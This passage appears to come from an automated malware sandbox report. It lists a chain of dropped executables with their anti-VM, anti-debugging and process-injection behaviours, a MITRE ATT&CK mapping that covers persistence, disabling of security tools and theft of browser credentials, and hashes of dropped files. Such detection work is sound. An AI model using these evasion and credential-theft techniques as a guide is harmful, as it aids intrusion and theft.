C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\10106821121\PcAIvJ0.cmd"6⤵
- System Location Discovery: System Language Discovery
PID:3200
-
-
C:\Users\Admin\AppData\Local\Temp\10106830101\v6Oqdnc.exe"C:\Users\Admin\AppData\Local\Temp\10106830101\v6Oqdnc.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3340 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3340 -s 12047⤵
- Loads dropped DLL
- Program crash
PID:3512
-
-
-
C:\Users\Admin\AppData\Local\Temp\10106840101\MCxU5Fj.exe"C:\Users\Admin\AppData\Local\Temp\10106840101\MCxU5Fj.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:3628 -
C:\Users\Admin\AppData\Local\Temp\10106840101\MCxU5Fj.exe"C:\Users\Admin\AppData\Local\Temp\10106840101\MCxU5Fj.exe"7⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3664
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3628 -s 5047⤵
- Loads dropped DLL
- Program crash
PID:3720
-
-
-
C:\Users\Admin\AppData\Local\Temp\10106850101\ce4pMzk.exe"C:\Users\Admin\AppData\Local\Temp\10106850101\ce4pMzk.exe"6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3836
-
-
C:\Users\Admin\AppData\Local\Temp\10106860101\mAtJWNv.exe"C:\Users\Admin\AppData\Local\Temp\10106860101\mAtJWNv.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:3920 -
C:\Users\Admin\AppData\Local\Temp\10106860101\mAtJWNv.exe"C:\Users\Admin\AppData\Local\Temp\10106860101\mAtJWNv.exe"7⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3964
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3920 -s 5047⤵
- Loads dropped DLL
- Program crash
PID:4044
-
-
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
4Windows Service
4Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
4Windows Service
4Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Impair Defenses
5Disable or Modify Tools
5Modify Registry
8Subvert Trust Controls
1Install Root Certificate
1Virtualization/Sandbox Evasion
2Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
3Credentials In Files
3Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
779B
MD539c8cd50176057af3728802964f92d49
SHA168fc10a10997d7ad00142fc0de393fe3500c8017
SHA256f685edf8437c0b505f5e366d8b1cb79e7770361cc4906240e7f8c8ad32c94e84
SHA512cf563b2b5a3553acf3a91298936b904abf87620c2fc582bcdb45dec5d4b877bef5ae81feae4b741e1aee1a916e543b5f6914d9c494d2aa33bc6f15c6fc904cc6
-
Filesize
71KB
MD583142242e97b8953c386f988aa694e4a
SHA1833ed12fc15b356136dcdd27c61a50f59c5c7d50
SHA256d72761e1a334a754ce8250e3af7ea4bf25301040929fd88cf9e50b4a9197d755
SHA512bb6da177bd16d163f377d9b4c63f6d535804137887684c113cc2f643ceab4f34338c06b5a29213c23d375e95d22ef417eac928822dfb3688ce9e2de9d5242d10
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\RLHRIIGD\service[1].htm
Filesize1B
MD5cfcd208495d565ef66e7dff9f98764da
SHA1b6589fc6ab0dc82cf12099d1c2d40ab994e8410c
SHA2565feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9
SHA51231bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\RLHRIIGD\soft[1]
Filesize987KB
MD5f49d1aaae28b92052e997480c504aa3b
SHA1a422f6403847405cee6068f3394bb151d8591fb5
SHA25681e31780a5f2078284b011c720261797eb8dd85e1b95a657dbce7ac31e9df1f0
SHA51241f715eea031fd8d7d3a22d88e0199277db2f86be73f830819288c0f0665e81a314be6d356fdc66069cb3f2abf0dd02aaa49ac3732f3f44a533fcec0dfd6f773
-
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\xmhyv50e.default-release\activity-stream.discovery_stream.json.tmp
Filesize26KB
MD581df6c708ea0179926e826d2e6071f70
SHA1ec334326520dcd7c956b676174c6ead06a1bf7fc
SHA256dd24038c7c6c0d810ea0f2e998361c1d715ebe7dc6623ecb8c8d3e1ebfc17f08
SHA512d3e7431e3cb3ced869ac9adf56e2104c3310cb88b56941ee72477b667d1bd1222c5cc024a9e8df5f3e6fdfccad8da7b19e40c857e960ac5f9c7e0aef8116b8f4
-
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\xmhyv50e.default-release\settings\main\ms-language-packs\browser\newtab\asrouter.ftl
Filesize15KB
MD596c542dec016d9ec1ecc4dddfcbaac66
SHA16199f7648bb744efa58acf7b96fee85d938389e4
SHA2567f32769d6bb4e875f58ceb9e2fbfdc9bd6b82397eca7a4c5230b0786e68f1798
SHA512cda2f159c3565bc636e0523c893b293109de2717142871b1ec78f335c12bad96fc3f62bcf56a1a88abdeed2ac3f3e5e9a008b45e24d713e13c23103acc15e658
-
Filesize
48KB
MD5d39df45e0030e02f7e5035386244a523
SHA19ae72545a0b6004cdab34f56031dc1c8aa146cc9
SHA256df468fc510aec82c827987f54b824b978dd71301f93d18d71e704727d6dfdfa2
SHA51269866ba5b53d1183a0899e3d22ff06111ae2e8df429beeb853c89f3ed0afb015dd4139b1c507566ffb0fe171a4ff1b318247b7a568dc492d9f71266f5c848a64
-
Filesize
361KB
MD52bb133c52b30e2b6b3608fdc5e7d7a22
SHA1fcb19512b31d9ece1bbe637fe18f8caf257f0a00
SHA256b8e02f2bc0ffb42e8cf28e37a26d8d825f639079bf6d948f8debab6440ee5630
SHA51273229885f8bf4aace4671b819a8487f36acb7878cd309bdf80b998b0a63584f3063364d192b1fc26fa71b9664908fe290a00f6898350c30f40d5f2a2d2efe51f
-
Filesize
938KB
MD515743c2914c612762ee60b2f12678ecf
SHA1b5aedc0e729c59675d5000ef153ea45611ee3dea
SHA2565f7ca62b9d262cf5145711224a4c498739904b721a7131e52bdf9265a441d895
SHA512926c21456df80d22477baa3c03c5bc175a5aeaa9d0b4efd9f211654fdd120b8fa620328c44a3399a0ab2145cc68eb5b881db7360fe818dee3e312c12b4a44aaf
-
Filesize
1KB
MD5cedac8d9ac1fbd8d4cfc76ebe20d37f9
SHA1b0db8b540841091f32a91fd8b7abcd81d9632802
SHA2565e951726842c371240a6af79d8da7170180f256df94eac5966c07f04ef4d120b
SHA512ce383ffef8c3c04983e752b7f201b5df2289af057e819cdf7310a55a295790935a70e6a0784a6fd1d6898564a3babab1ffcfbaa0cc0d36e5e042adeb3c293fa5
-
Filesize
3.8MB
MD5d4873846c90f3c15789b4da8453ae20c
SHA1665e9dade1075ce981af4eef928d140b6ba2ec98
SHA25671bcb77002e2dbddb270406a604a358dafe3461f03af3f4afe0bc2dd8ff6522e
SHA512d71afcc5a5e6932a5dead7fafd9a9280eb0f2eef7b068a02318af404519e93b36216f5c59125067a2ff72d179194406872f5fdae3870cff30f0258ff5a89cafe
-
Filesize
445KB
MD5c83ea72877981be2d651f27b0b56efec
SHA18d79c3cd3d04165b5cd5c43d6f628359940709a7
SHA25613783c2615668fba4a503cbefdc18f8bc3d10d311d8dfe12f8f89868ed520482
SHA512d212c563fdce1092d6d29e03928f142807c465ecaaead4fe9d8949b6f36184b8d067a830361559d59fc00d3bbe88feda03d67b549d54f0ec268e9e75698c1dd0
-
Filesize
4.5MB
MD5b62cf4ef1beba985a1c8985becba5f6d
SHA14aad88e88cd916222e81951a30dd4d65c6070ced
SHA25602531a05cdc60b09c3c831fe0ce557ba916d3ce7c8dde30a20dcc14436e05e4b
SHA5127f983cfa8ff6a31f42aa4d1f1bb8b0be96618871046fc48345654d20f74f48662030a1d954aa4ca9e0766ebb1d8b03fba0b1bce15b015762e0b9cd281e50faa5
-
Filesize
1.8MB
MD5dfbd8254f8f452c4efee8f92f623923f
SHA15ae96189ce5bf17bdbf2804227221ba605cffc2b
SHA2566100c8b2a1b5b81783da1847a812af9c75849e44368cf9847eaea47e02b04699
SHA512d7940f24817cd2c180babce402a1f532e50785c1a9a69180f57a32091eb48f7112300c2e9ed4a07e8eae60accfc82acd1d3d8b1cf4a8e7bb6549b06f58c988a4
-
Filesize
120KB
MD55b3ed060facb9d57d8d0539084686870
SHA19cae8c44e44605d02902c29519ea4700b4906c76
SHA2567c711ab33a034ed733b18b76a0154c56065c74a9481cbd0e4f65aa2b03c8a207
SHA5126733ae1c74c759031fb2de99beb938f94fc77ed8cc3b42b2b1d24a597f9e74eeab5289f801407619485f81fccaa55546344773e9a71b40b1af6b3c767b69e71a
-
Filesize
3.1MB
MD5fd04c991eb10a5f15e684a9fcedeb50f
SHA1e71ff46aa0903316a6d201bdc6cc9ab877d15a1e
SHA256563a5dada30127a4b2c6aa536439601ceeafb512153d1a12a67666f7518f1b50
SHA512c495154170afe875ea5f993cf2acbe8bca6f837214b5a6bccc02826a04420c7860e48ba5553a216f610ff8aeee32f1ffbaedd5c4fee3d63fc506e0b04cc9baf7
-
Filesize
1.6MB
MD5d766667c52ba9bea7bf4d5cf23a646bd
SHA1fc48719a442c7df839dae40025c46168aeb9fed0
SHA2568253e094b314b0b2f0ca057d60e7d7b3bfe28d244eb21993c068d7446a1c97bd
SHA512c4255d39087f049cf58ab72b0e64f2296c648a8680714f3b554bfa7bdcfe79fb640629acb5bb48b2d0ef7075abc242665dc0faea56aaed0144772232a9132c2a
-
Filesize
945KB
MD5a385d8c31ef92df2eb6c581dce6242ef
SHA16a432f5a32f4f5e6936430bc02d399f82949201c
SHA2567b8e747133f72581a37cc17beec2f3871865a524d87e311092fd8c4ccce3bd0c
SHA512832b5623ad608123318fec3a89edad57c7fa0fe364bd8a67a7eb7fade9a74a06ceef00f49df18f6ba57fb83913d98dbf38719889f9662aca4f78e0b2334d1077
-
Filesize
1.7MB
MD5e0554aae53db10231ec8fb6a0c848e81
SHA134fc237065e5efd90fecd17c9446c3c6546414d4
SHA2564a68ac0915fa15d9d13de6260aa3e939d8f8d5c2e68bf64c202a43e59ca0f28e
SHA512d24323de270d79e57109fea6ace5dedeb1451183f75f71ceb747f053da33aef37ff9cffd64c5a42943589871208f082a9b714d0757c43c549708d3cd5c254d62
-
Filesize
275B
MD5c203adcd3b4b1717be1e79d7d234f89c
SHA1a0c726c32766f5d3e3de1bdc9998da2bb2a657e4
SHA256bc953bccc3974ff2a40fd6ce700e499d11bfd2463014786a4cb0f7bac6568ad8
SHA512724f920d5e5f31155629155184a1ccf6299c72da04362062512c154e27bed136292a0af51f423e8e05d8f80426b72f679a01ab9662d4da6ffc06cfcbcd005368
-
Filesize
2.0MB
MD56006ae409307acc35ca6d0926b0f8685
SHA1abd6c5a44730270ae9f2fce698c0f5d2594eac2f
SHA256a5fa1579a8c1a1d4e89221619d037b6f8275f34546ed44a020f5dfcee3710f0b
SHA512b2c47b02c972f63915e2e45bb83814c7706b392f55ad6144edb354c7ee309768a38528af7fa7aeadb5b05638c0fd55faa734212d3a657cd08b7500838135e718
-
Filesize
415KB
MD5641525fe17d5e9d483988eff400ad129
SHA18104fa08cfcc9066df3d16bfa1ebe119668c9097
SHA2567a87b801af709e8e510140f0f9523057793e7883ec2b6a4eab90fcf0ec20fd4a
SHA512ee92bc34e21bb68aeda20b237e8b8e27f95e4cc44f5fd9743b52079c40f193cc342f8bb2690fd7ab3624e1690979118bd2e00a46bda3052cbd76bc379b87407e
-
Filesize
350KB
MD5b60779fb424958088a559fdfd6f535c2
SHA1bcea427b20d2f55c6372772668c1d6818c7328c9
SHA256098c4fe0de1df5b46cf4c825e8eba1893138c751968fcf9fe009a6991e9b1221
SHA512c17a7781790326579669c2b9ad6f7f9764cf51f44ad11642d268b077ade186563ae53fc5e6e84eb7f563021db00bef9ebd65a8d3fbe7a73e85f70a4caa7d8a7f
-
Filesize
717B
MD5603452768aaf8ee789c2fe379a48c38a
SHA165cf2ba5aee350c3ae469de874f2992bea5fb98e
SHA256f64baef98850b1b3cec55d76b48d8b1869f3fe98c89032ab5a8d868290db00bb
SHA512250e00454c99a83773293084c0c0a59457b19c0cd5b7a23b15472927c3be6a96e5f3ccd9dd1e08373df95a089beb2f920a9bd7a293d476afc8b7c8bec1d3295c
-
Filesize
183KB
MD5109cab5505f5e065b63d01361467a83b
SHA14ed78955b9272a9ed689b51bf2bf4a86a25e53fc
SHA256ea6b7f51e85835c09259d9475a7d246c3e764ad67c449673f9dc97172c351673
SHA512753a6da5d6889dd52f40208e37f2b8c185805ef81148682b269fff5aa84a46d710fe0ebfe05bce625da2e801e1c26745998a41266fa36bf47bc088a224d730cc
-
Filesize
717B
MD553af1d40c1b559df4fe16a69e9f83677
SHA1ceaae56f9e0e5cd5c9ed22c19204e0b29c894038
SHA25673b4e9582eb9d8e05b0926516a3241e122b364d38acfd5c548c4db6ee15efdfd
SHA512c0cb2097f9cc02d870f71df3039efc23d192ce41e2a26ffb1f37a4eed61b8153347c7799593825135fb90671931612e33cc53bf958bbb81660568004b59c6d2b
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\627N373FVNMY8MC3ACCP.temp
Filesize7KB
MD5b5cfb94bba308d469164b9bb33dd15a1
SHA157d21141c22b112bf0e2b542191e88dc6211b510
SHA256ea6f81fe7b11a73f7c826d1807ec445377253cc4f6a474ae77392e5b61002897
SHA512c94e8913f7811a3f92e9488d4bc360653539c754f53f5f512b92ac70fc5550ae651016b325d59569813e5ce17183300092398a66ad22f676ddb18b3005f2d20f
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize7KB
MD5cdf5b80ad6e9740f02e4683b5cb5073b
SHA1784837425eac99354dd7670158eb5763cb04d605
SHA25639e198920e5a66c0d386a90c3e3698581abf0674dfe1015603f1e6f278798fe9
SHA512975a5b7b3ec094209bccd6b116c3c08f5f0584fe4d3f44024ff9e9d14ced1d711f0a6c860d023053b3aab725fc657e3039705f2dc88b719d32274e146cb9a1bd
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\xmhyv50e.default-release\datareporting\glean\db\data.safe.bin
Filesize2KB
MD59f155ad0bd3e799f7417877891b82c53
SHA123cfb7a32c6336c1b7f0098f37a8aa1b722eab4f
SHA256c1ca9fecbc6afee14c23f025c1ff6f78d5ffcc8baf00157c5e13dd98b836f056
SHA5129be5a2abf658d04d5929da3fe12a6b2e9f50f81a5d50496442f2c2bdcb6bf563651610d9659d636a50f282bb90040bbbb1cf9fb5f9e0feafc5c8629bc3d54e0b
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\xmhyv50e.default-release\datareporting\glean\pending_pings\1f4b8a72-dbe4-4021-ab20-6b131db5f9fc
Filesize745B
MD5643e8dfd233c7a49c0a54a04e6687ac1
SHA1f7016f5bca385197a1b6f7c53c782c2078440762
SHA256cb4e44f21fc5fb048129a34a3e33602afddb8cdec0137193068d0fd19c299f16
SHA512a381505294ad49c04face20210e93978f481136b4273befd6dbb6d6d9daecbb3d368b96a91930f966be3fdfc7f3f08e0cd65b93ec23932cb3238cebeb6107b72
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\xmhyv50e.default-release\datareporting\glean\pending_pings\24d5423f-7c42-46be-8ec2-fe38449d500c
Filesize10KB
MD57efb0a27859f282275b2e35bcca91adc
SHA1b5a87b894130b1cd8b3f02872e3b24cb08322c4d
SHA2568a77341708a0842615e8526e40e6889a9bb67708917c7c9bc541bd959b77363a
SHA512cc38ba4641cde9dab215fe4d8f7caedd5b1b45bdfd27bdf47e861976ce35be644e2b27773bcfdc8bca7829aa39a5538f58bda03d584e346493542ddaa6a7ab05
-
Filesize
6KB
MD533bbde97cc1272076c924942cb255890
SHA1df34b1218cad9fc8e7c8f2b1af035c906a4cb733
SHA2568340f3ce6f1a14a5a16e319733554f7fc93a418f9d0d00d66d00cf7901baada4
SHA51254cd4994048844f5dfabaa5e2bd0095e9db4d1cea3da238a8620a7436deb03cf330dedadadb0c3bd3aa83e7f11c503c21b14c583225e59d015f28bd1a1330da8
-
Filesize
6KB
MD5c314608b00ee5ba8fd568b6b9ad3ce5f
SHA14cd3f6202743ee469b4d024f4ba5e7fe8e3e419c
SHA256e4232395c489b70a264a87aa038e5d60308a6853e35939e8a074bceccddf789e
SHA512530bb830964ed671bb61bde6bed062bbc632325fdf7fca4cca5e9a696d707f96ae882fbe6b0f3292ceedc4368a9711e11ddf6baab8a58d8ffee5546da4e782d0
-
Filesize
6KB
MD586a7f65e303d9f9472b3ffcef4b0c6ce
SHA1955d66886b0d026616c678b8bffcea4f6badcd87
SHA2561b226ca9cd5f0f2ed011da698fd205652baac99ed9a52afa060be320e98de8ae
SHA51294657240d71bb0d638e90cbfb0d8468f113695e4d93aec8152c38a6e0f131a356d3a22f125db27226f7ede7ddcf937428d01b85c69e541eafa622dfdf6d23b4b
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\xmhyv50e.default-release\sessionstore-backups\recovery.jsonlz4
Filesize4KB
MD54fcb2f56bcf27d01b4b94ea7543bb9ac
SHA1f31441fdbce4bb3d5dfd38b1deff8060f4159490
SHA25690e4bc2f5907a02440a0a271d5b3bc0dae4f9032da171fae1f24b8d92b3569a6
SHA512dd5df097461bd530c78faa60afcd79afe716185f5143aa512c404e009756b09d2c7a30576fe450bd6fa8c19f3a12e87e3db8597a25313e75390c18cc71cff390
-
Filesize
1.8MB
MD509e00631d85ee0955f01a859559615f7
SHA1fdfcd6e6a51797322526ad74f7cb0050c9d3e6b5
SHA256f62908ccaf5e61f223f3e1a7a8d1351dd61327afdd5263b4084f58ad1bd45297
SHA512079bafcff76d5ec1bc14bdb39b15de51e30e3cfb02a0155625ddb9207d908b07a04f12e39b6a0e6952129efc598697957c0d1b72beb1a52aa752ff9b14619e34